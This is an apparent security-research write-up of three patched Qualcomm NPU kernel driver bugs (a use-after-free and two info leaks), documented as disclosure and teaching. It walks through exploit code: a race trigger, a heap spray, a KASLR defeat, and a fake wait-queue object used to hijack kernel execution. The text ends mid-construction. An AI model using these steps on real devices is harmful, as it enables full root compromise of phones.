November 18, 2021

Fall of the machines: Exploiting the Qualcomm NPU (neural processing unit) kernel driver

Man Yue Mo

In this post, I’ll use three bugs in the Qualcomm NPU (neural processing unit) kernel driver that I reported between November and December 2020. The main bug is a use-after-free (UAF) vulnerability (CVE-2021-1940/GHSL-2021-1029) that was fixed publicly in July, and the other two are information leak bugs (CVE-2021-1968/GHSL-2021-1030 and CVE-2021-1969/GHSL-2021-1031) that were fixed publicly in October. Together, these three bugs form a very strong primitive that lets me execute arbitrary code in the kernel from an untrusted app with ease. I’ll then use these primitives to create a reverse root shell with SELinux disabled on Samsung devices.

The Qualcomm NPU

The NPU is a coprocessor designed specifically for AI and machine learning tasks. Such tasks are often computationally intensive, so neural network models and data can be sent to the NPU and processed there, which both speeds up the work on specially optimized hardware and frees up the CPU for other tasks, improving responsiveness. As AI and machine learning become more and more important on mobile devices, many OEM chipsets now ship with an NPU, but with new technology comes new attack surface. Recently, there has been a lot of security research in the area of NPUs, most notably the vulnerabilities discovered in Samsung’s NPU driver by Ben Hawkes (P0-2073 and P0-2171) and the exploit by Brandon Azad (An iOS hacker tries Android), as well as Reversing and Exploiting Samsung’s Neural Processing Unit by Maxime Peterlin, which focuses on reversing the NPU firmware.

While this existing research focuses on the Samsung NPU and its corresponding kernel driver, not much research has been carried out for the Qualcomm NPU and its kernel driver. (The only other public vulnerability that I know of in this driver is CVE-2019-10621.) I hope that this post inspires others to research the Qualcomm NPU, as well as the NPUs of other vendors.

The attack surface

As the NPU kernel driver was introduced in kernel version 4.14, only handsets with kernel version 4.14 or above are affected by these vulnerabilities. This includes many mid- to high-end phones released after late 2019, for example, the Samsung Galaxy S10, S20, and A71. As Google’s Pixel devices have their own processing unit for AI and machine learning (the edge TPU), they do not use the NPU at all. In fact, the NPU firmware is not even shipped with Pixel devices, and the kernel driver requires root privilege to use, so none of these vulnerabilities affect Pixel devices.

This, however, is not the case for Samsung and possibly other devices. While Maxime Peterlin noted in Reversing and Exploiting Samsung’s Neural Processing Unit that access to the Samsung NPU driver was restricted after the disclosure by Google Project Zero, this is not the case for Samsung devices that use a Qualcomm chipset. As of the time of writing, the Qualcomm NPU driver can still be reached from the untrusted app domain, which means any app can access it. The vulnerabilities in this post, as well as the exploit, can be launched directly from a user app. Throughout this post, I’ll assume a Samsung device with a Qualcomm chipset (which includes the S series handsets sold in the USA and China). The exploit was developed and tested on a Galaxy A71, but it should also work, with suitable adjustments, on S series devices running kernel 4.14 or above.

The kernel driver

The source code for the kernel driver is located in the directory drivers/media/platform/msm/npu of the kernel source tree. Apart from various tasks related to initializing and shutting down the NPU, it is mostly responsible for sending RPC messages between the CPU (kernel) and the NPU, as well as allocating shared memory for accessing neural network models, data, and results. The documentation for the NPU is sparse, if not nonexistent, and it is not very clear which application, if any, actually uses it. On the Galaxy A71 tested, not even Qualcomm’s own implementation of the NNAPI (Neural Network API) (implemented as the service android.hardware.neuralnetworks@1.x-service-qti) seemed to be using the NPU. So what I describe in this section is a conclusion drawn from educated guesses plus trial and error, and it may well not be how the NPU driver is meant to be used at all.

The driver is used by opening the file /dev/msm_npu. When the device driver file is opened, an npu_client object is created to represent this open file (a client of the NPU). The npu_client object is released when all handles to the file are closed.

The ioctl calls for interacting with the kernel driver are listed in the npu_ioctl method. The ioctls most relevant to this post are listed below, followed by a short usage sketch:

  1. npu_map_buf: Takes a Direct Memory Access (DMA) buffer allocated with the ION allocator and shares it with the NPU. This shared memory can then be used for loading neural network models onto the NPU.

  2. npu_unmap_buf: Unmaps the shared memory mapped with npu_map_buf from the NPU so that it can no longer access it.

  3. npu_load_network(_v2): Two different APIs that load a neural network model onto the NPU. The model data is stored in a shared memory area mapped using npu_map_buf. The details of the mapped buffer need to be supplied to this ioctl. This ioctl will perform some checks to ensure that the buffer is valid. The NPU kernel driver will also keep track of a list of neural networks that are loaded in the networks array of the global npu_host_ctx.

  4. npu_unload_network(_v2): Two different APIs that remove a neural network model from the NPU. This will also remove it from the networks array in the kernel driver.

  5. npu_exec_network(_v2): Two different APIs that execute the neural network model loaded from npu_load_network(_v2), presumably to carry out computation. Some checks are in place to make sure that the network provided is valid. Most of the parameters seem to be about the format of the neural network model and do not have any clear meaning to me.
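To make the flow concrete, here is a minimal sketch of how a userspace client might drive these ioctls. I’m assuming the request macros and struct fields from the msm_npu UAPI header; the ION buffer setup (ion_buf_fd) and the model size are placeholders, so treat this as an illustration rather than a verbatim recipe.

/* Sketch only: ioctl macros and struct fields assumed from the msm_npu
 * UAPI header; error handling and the ION allocation itself elided. */
#include <fcntl.h>
#include <stdint.h>
#include <sys/ioctl.h>

int npu_fd;
int ion_buf_fd;           /* placeholder: fd of an ION allocation holding the model */
#define MODEL_SIZE 0x2000 /* placeholder */

void npu_setup(void)
{
	struct msm_npu_map_buf_ioctl map_req = {0};
	struct msm_npu_load_network_ioctl_v2 load_req = {0};

	npu_fd = open("/dev/msm_npu", O_RDONLY);

	/* npu_map_buf: share the ION buffer with the NPU. */
	map_req.buf_ion_hdl = ion_buf_fd;
	map_req.size = MODEL_SIZE;
	ioctl(npu_fd, MSM_NPU_MAP_BUF, &map_req);

	/* npu_load_network_v2: load the model stored in the mapped buffer;
	 * on success the driver fills in load_req.network_hdl, which the
	 * exec and unload ioctls refer to. */
	load_req.buf_ion_hdl = ion_buf_fd;
	load_req.buf_size = MODEL_SIZE;
	ioctl(npu_fd, MSM_NPU_LOAD_NETWORK_V2, &load_req);
}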

These ioctls mostly perform some checks on the input parameters before repackaging them into RPC packets and sending them using the npu_send_network_cmd method. This method in turn calls the npu_host_ipc_send_cmd method to post the RPC packet to an appropriate message queue:

static int npu_send_network_cmd(struct npu_device *npu_dev,
	struct npu_network *network, void *cmd_ptr, bool async)
{
    ...
	} else {
        ...
		ret = npu_host_ipc_send_cmd(npu_dev,
			IPC_QUEUE_APPS_EXEC, cmd_ptr);
		if (ret)
			network->cmd_pending = false;
	}

	return ret;
}

These messages will be picked up by the NPU to perform the appropriate action. Most commands are synchronous, meaning that the kernel driver sends the RPC, then waits for the NPU to complete the action and reply before the ioctl call completes. What is particularly interesting is the asynchronous mode of the npu_exec_network commands. By setting the boolean field async in the ioctl arguments, this ioctl can be executed in asynchronous mode and return to the user as soon as the RPC message is sent:

int32_t npu_host_exec_network(struct npu_client *client,
			struct msm_npu_exec_network_ioctl *exec_ioctl)
{
	bool async_ioctl = !!exec_ioctl->async;
    ...
	ret = npu_send_network_cmd(npu_dev, network, &exec_packet, async_ioctl);
    ...

	if (async_ioctl) {
		pr_debug("Async ioctl, return now\n");
		goto exec_done;
	}
    ...
	mutex_unlock(&host_ctx->lock);

	ret = wait_for_completion_interruptible_timeout(
		&network->cmd_done,
		(host_ctx->fw_dbg_mode & FW_DBG_MODE_INC_TIMEOUT) ?
		NW_DEBUG_TIMEOUT : NW_CMD_TIMEOUT);

	mutex_lock(&host_ctx->lock);
    ...
}

Users of the asynchronous mode can then use the npu_receive_event ioctl to retrieve the results of the computation from the NPU at a later time. Upon completion of a command, the NPU will send an RPC back to the CPU (kernel), which would then be processed by the app_msg_proc method.

The vulnerabilities

The vulnerabilities in this post are all related to the asynchronous mode in npu_exec_network. So let’s take a closer look at what happens when this ioctl is used. As I explained in the last section, the general steps involved in using the npu_exec_network ioctl seem to be the following:

  1. Map some shared memory region in the NPU using npu_map_buf and use it to store a neural network model.
  2. Load the neural network model onto the NPU using npu_load_network.
  3. Use npu_exec_network to execute the network with the async flag on. (A sketch of this flow follows the list.)
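A hedged sketch of step three and the subsequent event retrieval, continuing the earlier example (names again assumed from the UAPI header):

/* Sketch: asynchronous execution and later event retrieval. */
static uint8_t stats_buf[0x4000];   /* userspace stats buffer */

void npu_exec_async(uint32_t network_hdl)
{
	struct msm_npu_exec_network_ioctl_v2 exec_req = {0};
	struct msm_npu_event evt = {0};

	exec_req.network_hdl = network_hdl;            /* from npu_load_network_v2 */
	exec_req.async = 1;                            /* return once the RPC is sent */
	exec_req.stats_buf_addr = (uint64_t)stats_buf;
	exec_req.stats_buf_size = sizeof(stats_buf);
	ioctl(npu_fd, MSM_NPU_EXEC_NETWORK_V2, &exec_req);

	/* Later: collect the event that app_msg_proc queues to this
	 * client once the NPU replies. */
	ioctl(npu_fd, MSM_NPU_RECEIVE_EVENT, &evt);
}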

The more interesting part is step two. As mentioned in the last section, when the network is loaded, it does not just get loaded onto the NPU. The kernel driver also keeps a record of the loaded network itself. This is done via the alloc_network method:

static struct npu_network *alloc_network(struct npu_host_ctx *ctx,
	struct npu_client *client)
{
	int32_t i;
	struct npu_network *network = ctx->networks;
	for (i = 0; i < MAX_LOADED_NETWORK; i++) {
		if (network->id == 0)
			break;
		network++;
	}
    ...
	network->client = client;
    ...
	return network;
}

Instead of being dynamically allocated, a network is actually just an entry in the statically allocated networks array of the global npu_host_ctx variable ctx. The ctx is shared by all users of the kernel driver, so only a very limited number of networks can be loaded at a time. "Allocating" an npu_network therefore just means that its data gets set in the networks array and its id is returned to the user. The npu_network also stores the npu_client of the user that loaded it. This generally serves the following purposes:

  1. To distinguish between the users of the network so that each user can only access its own network. When getting a network via its id, the client field is checked to ensure that the user has the rights to access the network:

     static struct npu_network *get_network_by_hdl(struct npu_host_ctx *ctx,
         struct npu_client *client, uint32_t hdl)
     {
         int32_t i;
         struct npu_network *network = ctx->networks;
         ...
         for (i = 0; i < MAX_LOADED_NETWORK; i++) {
             if (network->network_hdl == hdl)
                 break;
             network++;
         }
         ...
         if (client && (client != network->client)) {     //<-------- Check that client owns the network
             pr_err("network %lld doesn't belong to this client\n",
                 network->id);
             return NULL;
         }
    
         network_get(network);
         return network;
     }
    
  2. When using the asynchronous ioctl calls, to identify the user that made the call when the NPU replied:

     static void app_msg_proc(struct npu_host_ctx *host_ctx, uint32_t *msg)
     {
         ...
         case NPU_IPC_MSG_EXECUTE_DONE:
         {
             ...
             network = get_network_by_hdl(host_ctx, NULL,
                 exe_rsp_pkt->network_hdl);
             ...
             if (!network->cmd_async) {
                 complete(&network->cmd_done);
             } else {
                 ...
                 if (npu_queue_event(network->client, &kevt))  //<------ queue the event to the client's event queue
                     pr_err("queue npu event failed\n");
             }
             network_put(network);
    

As the above code, which handles messages coming from the NPU, runs in a kernel worker, it relies on the npu_network whose handle is included in the message to locate the user that originated the request. It then queues an event to that client’s event queue, prompting the client to respond.

Of course, as npu_network is globally owned data, it is important that when the file is closed and the npu_client is freed, appropriate cleanup is carried out to remove the client pointer from npu_network to avoid a use-after-free. This is carried out in npu_host_cleanup_networks. When npu_close is called, this function finds every npu_network that stores this npu_client and tries to unload it using npu_host_unload_network:

void npu_host_cleanup_networks(struct npu_client *client)
{
    ...
	for (i = 0; i < MAX_LOADED_NETWORK; i++) {
		network = &host_ctx->networks[i];
		if (network->client == client) {
            ...
			npu_host_unload_network(client, &unload_req);
		}
	}
    ...
}

The method npu_host_unload_network will remove the client pointer from the npu_network in the path under free_network:

int32_t npu_host_unload_network(struct npu_client *client,
			struct msm_npu_unload_network_ioctl *unload)
{
    ...
free_network:
    ...
	free_network(host_ctx, client, network->id); //<------ zero out npu_network, which removes client
    ...
	return ret;
}

However, not all paths lead to free_network. Some may return early, although most of the error paths that return early are not reachable at this stage. One particular error path that may trigger an early return is the following:

	ret = npu_send_network_cmd(npu_dev, network, &unload_packet, false);
	if (ret) {
		pr_err("NPU_IPC_CMD_UNLOAD sent failed: %d\n", ret);
		/*
		 * If another command is running on this network,
		 * don't free_network now.
		 */
		if (ret == -EBUSY) {       //<----------- returns early and skip free_network
			pr_err("Network is running, retry later\n");
			network_put(network);
			mutex_unlock(&host_ctx->lock);
			return ret;
		}
		goto free_network;
	}

If npu_send_network_cmd fails and the error is -EBUSY, then free_network will be skipped and client won’t be removed. Two interesting questions arise:

  1. The obvious question: Is it possible to cause npu_send_network_cmd to return -EBUSY and trigger this path?
  2. The second question: Even if this path is triggered, how do I get access to the npu_network that holds the freed reference to npu_client? Once the file is closed, the npu_client is freed and I can no longer access the NPU driver through it. Because all accesses to npu_network are guarded by a check against the npu_client, I cannot retrieve the npu_network holding the freed npu_client without making ioctl calls as that client, and making ioctl calls as that client would require having access to the freed npu_client already.

It turns out that the answer to both these questions is the same: asynchronous execution.

Racing the CPU against the NPU

The answer to question one is actually very simple. By taking a look at npu_send_network_cmd, I saw that if the cmd_pending flag is set on the npu_network, then -EBUSY would be returned:

static int npu_send_network_cmd(struct npu_device *npu_dev,
	struct npu_network *network, void *cmd_ptr, bool async)
{
    ...
	} else if (network->cmd_pending) {
		pr_err("Another cmd is pending\n");
		ret = -EBUSY;

This is because cmd_pending is set when npu_send_network_cmd is called to send a command to the NPU and reset when the command is processed by the NPU:

static int npu_send_network_cmd(struct npu_device *npu_dev,
	struct npu_network *network, void *cmd_ptr, bool async)
{
    ...
	} else {
        ...
		network->cmd_async = async;
		network->cmd_ret_status = 0;
		network->cmd_pending = true;
		network->trans_id = atomic_read(&host_ctx->ipc_trans_id);
		ret = npu_host_ipc_send_cmd(npu_dev,
			IPC_QUEUE_APPS_EXEC, cmd_ptr);
   }
   ...
}
...
static void app_msg_proc(struct npu_host_ctx *host_ctx, uint32_t *msg)
{
    ...
	switch (msg_id) {
	case NPU_IPC_MSG_EXECUTE_DONE:
	{
        ...
		network->cmd_pending = false;

By issuing an async npu_exec_network command and then quickly closing the file /dev/msm_npu, the exec command may still be pending when npu_host_cleanup_networks tries to unload the network, so cmd_pending is still true and the unload fails with -EBUSY.
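Putting the two halves together, the trigger for the race looks roughly like this (a sketch; the spray that reclaims the freed npu_client comes later in the post):

/* Sketch of the race trigger. If the NPU has not yet replied when the
 * file is closed, npu_host_cleanup_networks -> npu_host_unload_network
 * calls npu_send_network_cmd, which sees cmd_pending == true, returns
 * -EBUSY, and skips free_network: the global networks array keeps a
 * dangling pointer to the now-freed npu_client. */
exec_req.async = 1;
ioctl(npu_fd, MSM_NPU_EXEC_NETWORK_V2, &exec_req);
close(npu_fd);   /* npu_close frees the npu_client */
/* ...now reclaim the freed npu_client (e.g. with a sendmsg spray)
 * before the NPU's completion message reaches app_msg_proc. */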

As it turns out, this is also the solution to the second problem. When sending an npu_exec_network task in async mode, there is no need for me to fetch the npu_network that contains the freed npu_client. I just need to wait and let the NPU do my bidding for me. When the NPU finishes the task and sends an RPC back to the CPU, the message will be processed by app_msg_proc:

static void app_msg_proc(struct npu_host_ctx *host_ctx, uint32_t *msg)
{
    ...
	case NPU_IPC_MSG_EXECUTE_V2_DONE:
	{
        ...
		if (network->cmd_async) {
            ...
			if (npu_queue_event(network->client, &kevt))
            ...

… which will pass network->client (which is now freed) to npu_queue_event. What’s more, npu_queue_event performs a wake_up_interruptible on the wait_queue_head_t wait of client:

static int npu_queue_event(struct npu_client *client, struct npu_kevent *evt)
{
    ...
	wake_up_interruptible(&client->wait);
	return 0;
}

… which will walk the entries of the wait queue and call the function stored in each entry, with a pointer to the entry as the first argument. So by replacing the npu_client with a fake object and having its wait queue point to an address with controlled data, I can execute any function with control of the first argument. What’s more, because it is executed on a kernel worker, it’ll be executed as root. This bug was assigned CVE-2021-1940.

An expensive one-character error

While the UAF bug itself could probably be exploited alone, it would be great if I could get the heap address of some data that I control, where I can store my fake wait queue and entries. This would make it much easier to craft a fake object and greatly simplify the exploit. It turns out that there is another vulnerability that allows me to do just that.

When using the npu_exec_network_v2 API to execute a network, I can specify a stats_buf for the network, presumably to collect profiling and debugging information:

int32_t npu_host_exec_network_v2(struct npu_client *client,
	struct msm_npu_exec_network_ioctl_v2 *exec_ioctl,
	struct msm_npu_patch_buf_info *patch_buf_info)
{
    ...
	network->stats_buf_u = (void __user *)exec_ioctl->stats_buf_addr;
	network->stats_buf_size = exec_ioctl->stats_buf_size;

While trying to understand how the asynchronous ioctl works, I thought it might be useful to inspect the content of the stats_buf to see if there was any useful debugging information, so I decided to use this API and inspect the content of the stats_buf. However, the stats_buf only ever gave me some fixed-length data that didn’t seem to make much sense. After some trials, I realized that I might actually be looking at memory addresses. So I took a look at the code that is responsible for returning the stats_buf to the user. When the NPU sends a message to the CPU after the completion of npu_exec_network_v2, it’ll be handled by app_msg_proc:


static void app_msg_proc(struct npu_host_ctx *host_ctx, uint32_t *msg)
{
    ...
	case NPU_IPC_MSG_EXECUTE_V2_DONE:
	{
        ...
		if (network->cmd_async) {
            ...
			kevt.reserved[0] = (uint64_t)network->stats_buf;
			kevt.reserved[1] = (uint64_t)network->stats_buf_u;
			if (npu_queue_event(network->client, &kevt))

… which among other things stores the kernel address of the stats_buf and the user space address that is the destination for copying the stats_buf back to user space. These are stored in reserved in an event. When the user wants to read the contents of the stats_buf, they can use the npu_receive_event ioctl call, which then calls the npu_process_kevent function to process the events that were queued with npu_queue_event above.

static int npu_process_kevent(struct npu_kevent *kevt)
{
	int ret = 0;
	switch (kevt->evt.type) {
	case MSM_NPU_EVENT_TYPE_EXEC_V2_DONE:
		ret = copy_to_user((void __user *)kevt->reserved[1],
			(void *)&kevt->reserved[0],                      //<----------- 1.
			kevt->evt.u.exec_v2_done.stats_buf_size);
        ...

I have to admit, I missed the bug completely when I audited the code. In the above, the copy_to_user is meant to copy the content of the stats_buf back to user space. As the address of the stats_buf is stored in kevt->reserved[0], the source of copy_to_user (indicated at one in the above snippet) should be kevt->reserved[0]. Instead, &kevt->reserved[0] is used, meaning that the content of kevt at the offset of reserved[0] is copied instead. This content, of course, is the address of the stats_buf followed by the user space address stats_buf_u. Moreover, as the size of the stats_buf can be much larger than the size of kevt, this in fact leads to an out-of-bounds read in copy_to_user. (It still cannot read the next object in the bucket due to hardened usercopy, but it can be used to read uninitialized memory.) This bug was assigned CVE-2021-1968.
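From userspace, harvesting the leak is then just a matter of reading the start of the stats buffer once the event has been received; a sketch, continuing the earlier example:

/* Sketch: after MSM_NPU_RECEIVE_EVENT for an async exec_v2 command,
 * the start of the user stats buffer holds kevt->reserved[0] and
 * kevt->reserved[1] rather than stats data. */
uint64_t leaked[2];
memcpy(leaked, stats_buf, sizeof(leaked));
uint64_t stats_buf_kaddr = leaked[0];   /* kernel heap address of stats_buf */
uint64_t stats_buf_uaddr = leaked[1];   /* our own stats_buf_u, for sanity checking */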

I started out wanting to get some debugging data for my neural network and I ended up getting debugging data for the kernel, so I’m not complaining.

Size confusion

While looking through the implementation of app_msg_proc, I noticed another issue:

static void app_msg_proc(struct npu_host_ctx *host_ctx, uint32_t *msg)
{
    ...
	struct npu_kevent kevt;                         //<---------- 1.
    ...
	switch (msg_id) {
	case NPU_IPC_MSG_EXECUTE_V2_DONE:
	{
        ...
		if (network->cmd_async) {
			pr_debug("async cmd, queue event\n");
			kevt.evt.type = MSM_NPU_EVENT_TYPE_EXEC_V2_DONE;
			kevt.evt.u.exec_v2_done.network_hdl =
				exe_rsp_pkt->network_hdl;
			kevt.evt.u.exec_v2_done.exec_result =
				exe_rsp_pkt->header.status;
			kevt.evt.u.exec_v2_done.stats_buf_size = stats_size;
			kevt.reserved[0] = (uint64_t)network->stats_buf;
			kevt.reserved[1] = (uint64_t)network->stats_buf_u;
			if (npu_queue_event(network->client, &kevt))
				pr_err("queue npu event failed\n");

First, note that the npu_kevent object kevt used here was not initialized (see one in the above snippet). At first glance, this doesn’t seem to be a problem because, prior to use, various fields in kevt are initialized. So let’s check whether all fields are initialized:

struct npu_kevent {
	struct list_head list;
	struct msm_npu_event evt;
	uint64_t reserved[4];
};

As you can see, reserved is an array of length four, but only reserved[0] and reserved[1] are initialized. This turns out not to be a problem because when kevt is used by npu_receive_event, only evt, reserved[0], and reserved[1] are used:

static int npu_receive_event(struct npu_client *client,
	unsigned long arg)
{
	struct npu_kevent *kevt;
    ...
	if (list_empty(&client->evt_list)) {
      ...
	} else {
        ...
		npu_process_kevent(kevt);               //<------ only uses `reserved[0]` and `reserved[1]`
		ret = copy_to_user(argp, &kevt->evt,
			sizeof(struct msm_npu_event));
        ...
	}
	mutex_unlock(&client->list_lock);
	return ret;
}

So let’s check and see if all the fields in evt are initialized. The field evt is an msm_npu_event:

struct msm_npu_event {
	uint32_t type;
	union {
		struct msm_npu_event_execute_done exec_done;
		struct msm_npu_event_execute_v2_done exec_v2_done;
		struct msm_npu_event_ssr ssr;
		uint8_t data[128];
	} u;
	uint32_t reserved[4];
};

This turns out to contain a field u, which is a union. In app_msg_proc, u is interpreted as an msm_npu_event_execute_v2_done, which has these fields:

struct msm_npu_event_execute_v2_done {
	uint32_t network_hdl;
	int32_t exec_result;
	/* stats buf size filled */
	uint32_t stats_buf_size;
};

… which are indeed all initialized. The problem is, the size of a union is the size of its largest member, which in the case of msm_npu_event is data[128], way bigger than the size of msm_npu_event_execute_v2_done. So there is going to be a lot of padding that is uninitialized. Even apart from this, the reserved array of msm_npu_event is completely uninitialized. What’s worse is that, as we’ve seen above, npu_receive_event will simply copy the whole msm_npu_event back to user space:

static int npu_receive_event(struct npu_client *client,
	unsigned long arg)
{
	struct npu_kevent *kevt;
    ...
	if (list_empty(&client->evt_list)) {
      ...
	} else {
        ...
		ret = copy_to_user(argp, &kevt->evt,
			sizeof(struct msm_npu_event));
        ...
	}
    ...
}

This means all the uninitialized data will be copied back to user space. This bug was assigned CVE-2021-1969.
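To put numbers on it, the sizes can be checked with a quick standalone sketch (I’ve trimmed the union to the members that matter, since data[128] dominates its size on a 64-bit build):

#include <stdint.h>
#include <stdio.h>

/* Redeclarations of the structs above, trimmed to the members that
 * matter for the size calculation. */
struct msm_npu_event_execute_v2_done {
	uint32_t network_hdl;
	int32_t exec_result;
	uint32_t stats_buf_size;
};

struct msm_npu_event {
	uint32_t type;
	union {
		struct msm_npu_event_execute_v2_done exec_v2_done;
		uint8_t data[128];
	} u;
	uint32_t reserved[4];
};

int main(void)
{
	/* Initialized by app_msg_proc: type (4 bytes) + exec_v2_done
	 * (12 bytes). The union still occupies 128 bytes, so 116 bytes
	 * of it, plus the 16-byte reserved array, reach userspace
	 * uninitialized. */
	printf("msm_npu_event: %zu bytes\n", sizeof(struct msm_npu_event));       /* 148 */
	printf("initialized:   %zu bytes\n",
	       sizeof(uint32_t) + sizeof(struct msm_npu_event_execute_v2_done)); /* 16 */
	return 0;
}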

Exploiting the bugs

These three bugs together give very strong primitives, both for leaking kernel addresses to defeat kernel address space layout randomization (KASLR) and for executing arbitrary functions with a controlled argument. The exploitation is fairly straightforward with these primitives. Since I don’t often have the luxury of having so many bugs that work together so well, I’ll indulge myself and use all three in the exploit. The steps to gain arbitrary kernel code execution are as follows:

  1. Use CVE-2021-1968 to obtain the address of the stats_buf, and then reclaim it so that I can fill it with controlled data.
  2. Use CVE-2021-1969 to obtain an address of a kernel function to defeat KASLR.
  3. Use CVE-2021-1940 to execute arbitrary code with the knowledge obtained from steps one and two.

Getting address to controlled data

As explained in the section “An expensive one-character error”, by simply using the npu_exec_network_v2 ioctl call in async mode, the address of the stats_buf buffer will be copied to a user space buffer that I supplied when executing the network. The stats_buf is allocated via kzalloc as a 0x4000-byte buffer, and it is freed when the npu_network is unloaded via the npu_unload_network ioctl.

I should be able to do the following:

  1. Use npu_exec_network_v2 to trigger CVE-2021-1968 and obtain the address of the stats_buf of a npu_network that I specified.
  2. Unload the network using npu_unload_network to free the stats_buf.
  3. Use the sendmsg syscall to allocate a message buffer of size 0x4000 to reclaim the freed stats_buf. As allocations of this size are very rare, this will almost always allocate the message buffer at the address of the freed stats_buf. This means that the address of the stats_buf obtained in step one now points to the content of the message buffer, which I have complete control of.

The use of sendmsg in step three is a standard Linux kernel heap spray technique that can be used to allocate almost arbitrary data of almost arbitrary size (with some fairly generous lower and upper bounds). I’ll be using this technique later in the post, but as it is very well-documented, I’ll not repeat the details here and instead refer readers to this article. The key point is that, with sendmsg, I can allocate arbitrary data of almost any size using kmalloc.
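For readers who want the shape of the technique without leaving this post, here is a minimal sketch under the usual assumptions: an AF_UNIX socket pair whose peer buffer has been filled beforehand, so that sendmsg blocks while its kmalloc’d control buffer, holding our payload, stays alive.

/* Sketch of the sendmsg heap spray. The kernel copies msg_control into
 * a kmalloc(msg_controllen) allocation; as long as the send is blocked,
 * the allocation (and our payload in it) survives in the kmalloc bucket
 * of our choosing. The first bytes double as a cmsghdr, which slightly
 * constrains the payload; see the linked article for details. */
#include <string.h>
#include <sys/socket.h>

void spray_0x4000(const void *payload, size_t len)
{
	int sv[2];
	char ctl[0x4000] = {0};
	struct msghdr msg = {0};

	socketpair(AF_UNIX, SOCK_STREAM, 0, sv);
	/* ...fill sv[1]'s receive buffer first so the sendmsg below blocks;
	 * run this function in a helper thread, one per sprayed object... */

	memcpy(ctl, payload, len);
	msg.msg_control = ctl;
	msg.msg_controllen = sizeof(ctl);   /* kmalloc(0x4000) in the kernel */
	sendmsg(sv[0], &msg, 0);            /* blocks, keeping the allocation alive */
}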

These steps now allow me to place 0x4000 bytes of arbitrary data at an address that I know. That is much more than enough for my purposes.

Defeating KASLR

Next, I’ll use CVE-2021-1969 to obtain a kernel function address to defeat KASLR. Recall from the section “Size confusion” that the uninitialized variable that gets copied back to user space originated as the npu_kevent variable kevt in app_msg_proc:

static void app_msg_proc(struct npu_host_ctx *host_ctx, uint32_t *msg)
{
    ...
	struct npu_kevent kevt;
    ...
	switch (msg_id) {
	case NPU_IPC_MSG_EXECUTE_V2_DONE:
	{
        ...
		if (network->cmd_async) {
            ...
			if (npu_queue_event(network->client, &kevt))
            ...

So the uninitialized variable here is a stack variable. Note that, although Android 11 added support for automatic variable initialization in the kernel, the kernel configuration CONFIG_INIT_STACK_ALL needs to be switched on to benefit from it, and not all vendors have enabled this configuration. In particular, as of the time of writing, it is not enabled on most Samsung devices. (It seems that only devices running kernel 5.4, that is, the S21, Z Flip 3, etc., have this enabled.) So even on Android 11, I can still take full advantage of CVE-2021-1969 to leak kernel addresses via this uninitialized variable.

After some testing, it appears that the address of host_irq_wq is always located at the same offset within the uninitialized kevt variable. This gives me an easy and reliable way to retrieve its address and use it to defeat KASLR.
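Recovering the KASLR slide from the leak is then a single subtraction. A sketch; the _STATIC constants below are placeholders for symbol addresses read from the matching (unslid) kernel image:

/* leaked_host_irq_wq: read from its fixed offset inside the
 * uninitialized kevt bytes returned by the receive-event ioctl. */
#define HOST_IRQ_WQ_STATIC    0xffffff8009000000ULL /* placeholder */
#define BPF_PROG_RUN32_STATIC 0xffffff8008000000ULL /* placeholder */

uint64_t kaslr_slide = leaked_host_irq_wq - HOST_IRQ_WQ_STATIC;
uint64_t bpf_prog_run32_addr = BPF_PROG_RUN32_STATIC + kaslr_slide; /* used later */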

Gaining arbitrary code execution

To recap from the section “Racing the CPU against the NPU”, to exploit the use-after-free bug CVE-2021-1940, I’d need to win the following race:

[Figure: timeline of the race. Blue boxes: events I initiate (the async exec, closing /dev/msm_npu, respraying the freed npu_client). Red boxes: events initiated by the NPU (processing the command, sending the completion message).]

Boxes in blue indicate events that I initiate and whose timing I control, whereas boxes in red indicate events initiated by the NPU that I cannot control. So to win the race, I need to free the npu_client and replace the freed object before the NPU completes the task. While it may be possible to create a computationally intensive task to delay the NPU, I wasn’t able to create any task on the NPU that would even get as far as being executed. However, it turns out that the race is fairly easy to win, even when the NPU is just going through the error path. Moreover, a failure to win the race does not normally have any adverse consequences, other than leaving a network permanently loaded. There are only 32 network slots, which means the race can fail at most 32 times before the available networks run out, but on the device tested (A71), the race is usually won within a few trials, giving me plenty of margin.

It remains to replace the freed npu_client with an appropriate fake object. Recall that the npu_client’s wait queue gets passed to wake_up_interruptible:

static int npu_queue_event(struct npu_client *client, struct npu_kevent *evt)
{
    ...
	wake_up_interruptible(&client->wait);
	return 0;
}

… where wake_up_interruptible is a thin wrapper around __wake_up_common, passing &client->wait as wq_head to it, as well as setting the other arguments to some default values:

static int __wake_up_common(struct wait_queue_head *wq_head, unsigned int mode,
			int nr_exclusive, int wake_flags, void *key,
			wait_queue_entry_t *bookmark)
{
	wait_queue_entry_t *curr, *next;
	int cnt = 0;

	lockdep_assert_held(&wq_head->lock);

	if (bookmark && (bookmark->flags & WQ_FLAG_BOOKMARK)) {
        ...
	} else
		curr = list_first_entry(&wq_head->head, wait_queue_entry_t, entry);    //<----------- 1.

    ...
	list_for_each_entry_safe_from(curr, next, &wq_head->head, entry) {
        ...
		ret = curr->func(curr, mode, wake_flags, key);          //<------------ 2.
        ...
	}
    ...
}

In our case, the entries of the queue client->wait are taken out at one above, and the function stored in each entry’s func field is executed with the entry as its first argument (two in the above snippet).

So the crucial field to control in the npu_client is the queue wait, which is a doubly linked list of its entries. By replacing a freed npu_client via the sendmsg heap spray so that the entries of its wait queue point to controlled data (the stats_buf that I obtained in the section “Getting address to controlled data”), I can place an arbitrary function pointer at the appropriate offset in stats_buf and have it executed. Moreover, as the function is executed with the curr entry in wait as its first argument, which, by construction, points into the stats_buf, I control the data behind the first argument curr as well.

[Figure: layout of the fake objects. The sprayed fake npu_client’s wait queue points to a fake wait_queue_entry inside the reclaimed stats_buf, whose func field is the function to be called.]
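In code, the payload that replaces the freed npu_client only needs its wait queue to be meaningful. A sketch; every constant here is hypothetical and has to be taken from the matching kernel build:

/* All constants below are placeholders for build-specific values. */
#define CLIENT_SIZE     0x200  /* npu_client's kmalloc bucket (assumed) */
#define OFF_WAIT_HEAD   0x10   /* offset of client->wait.head (assumed) */
#define OFF_FUNC        0x10   /* offset of wait_queue_entry.func (assumed) */
#define FAKE_ENTRY_OFF  0x100  /* where the fake entry lives in stats_buf */

char fake_client[CLIENT_SIZE];
/* wait.head.next must point at the entry list_head *inside* the fake
 * wait_queue_entry, so that list_first_entry() recovers the entry;
 * the 0x18 list_head offset within the entry is assumed. */
uint64_t fake_entry_list = stats_buf_kaddr + FAKE_ENTRY_OFF + 0x18;

uint64_t *wait_head = (uint64_t *)(fake_client + OFF_WAIT_HEAD);
wait_head[0] = fake_entry_list;   /* wait.head.next */
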